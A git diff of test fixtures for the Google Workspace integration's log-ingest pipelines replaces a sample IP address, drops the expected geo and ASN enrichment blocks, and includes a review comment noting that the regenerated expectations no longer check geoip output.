@@ -466,35 +376,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429418700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming_through_relay\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", + "ingested": "2021-12-09T13:39:16.340912700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming_through_relay\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_spamming_through_relay", "id": "1", @@ -530,7 +422,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -552,35 +444,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429420200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", + "ingested": "2021-12-09T13:39:16.340919200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_spamming", "id": "1", @@ -616,7 +490,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -639,35 +513,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429421600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "ingested": "2021-12-09T13:39:16.340925400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", "action": "account_disabled_hijacked", @@ -703,7 +559,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -722,35 +578,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429423100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"gov_attack_warning\"}}", + "ingested": "2021-12-09T13:39:16.340931600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"gov_attack_warning\"}}", "provider": "login", "action": "gov_attack_warning", "id": "1", @@ -780,7 +618,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -804,35 +642,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429424600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_failure_type\",\"value\":\"login_failure_access_code_disallowed\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", + "ingested": "2021-12-09T13:39:16.340937700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_failure_type\",\"value\":\"login_failure_access_code_disallowed\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_failure", "id": "1", @@ -864,7 +684,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -888,35 +708,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429425900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_challenge\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", + "ingested": "2021-12-09T13:39:16.340943800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_challenge\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_challenge", "id": "1", @@ -947,7 +749,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -971,35 +773,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429427500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_verification\",\"parameters\":[{\"name\":\"is_second_factor\",\"boolValue\":false},{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", + "ingested": "2021-12-09T13:39:16.340950400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_verification\",\"parameters\":[{\"name\":\"is_second_factor\",\"boolValue\":false},{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_verification", "id": "1", 
@@ -1030,7 +814,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1052,35 +836,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429429Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"logout\",\"parameters\":[{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", + "ingested": "2021-12-09T13:39:16.340956600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"logout\",\"parameters\":[{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "logout", "id": "1", @@ -1111,7 +877,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1134,35 +900,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429430400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"is_suspicious\",\"boolValue\":false},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", + "ingested": "2021-12-09T13:39:16.340962800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"is_suspicious\",\"boolValue\":false},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_success", "id": "1", 
diff --git a/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log b/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log
index ed672b58a56..ca7933706be 100644
--- a/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log
+++ b/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log
@@ -1,2 +1,2 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}}
diff --git a/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json b/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json
index d9d62d4b2d2..ded2713b385 100644
--- a/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json
+++ b/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json
@@ -10,7 +10,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -37,35 +37,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.810436900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", + "ingested": "2021-12-09T13:39:18.166836800Z", + "original": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "provider": "saml", "action": "login_failure", "id": "1", @@ -97,7 +79,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -122,35 +104,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:30.810447600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}",
+ "ingested": "2021-12-09T13:39:18.166844900Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}",
 "provider": "saml",
 "action": "login_success",
 "id": "1",
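Review bot: The regenerated expectations drop `source.geo` and `source.as` outright instead of replacing them with the enrichment data for 67.43.156.13, so this fixture no longer asserts that the pipeline's geoip processing produces anything (hunks at -37 and -122 of this file; the same deletions recur in every hunk of test-user-accounts.log-expected.json and in the haproxy expected files below). If the new address was chosen because it is in the GeoIP test database that elastic-package ships, the regenerated output should contain a `source.geo` block for it; its absence suggests the expectations were regenerated in an environment without that database, which would mask a broken or silently skipped geoip processor on the next run. Worth confirming by regenerating the expected files with `elastic-package test pipeline --generate` against a stack that has the test database, and by checking whether the geoip processor in the pipeline is configured with `ignore_missing`/`ignore_failure`, which is what would let the field vanish without failing the test.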
diff --git a/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log b/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log
index 7da8fdec935..230deadf26e 100644
--- a/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log
+++ b/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log
@@ -1,8 +1,8 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"2sv_change","name":"2sv_disable"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"2sv_change","name":"2sv_enroll"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"password_change","name":"password_edit"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"recovery_info_change","name":"recovery_email_edit"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"recovery_info_change","name":"recovery_phone_edit"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"recovery_info_change","name":"recovery_secret_qa_edit"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"titanium_change","name":"titanium_enroll"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"titanium_change","name":"titanium_unenroll"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"2sv_change","name":"2sv_disable"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"2sv_change","name":"2sv_enroll"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"password_change","name":"password_edit"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"recovery_info_change","name":"recovery_email_edit"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"recovery_info_change","name":"recovery_phone_edit"}}
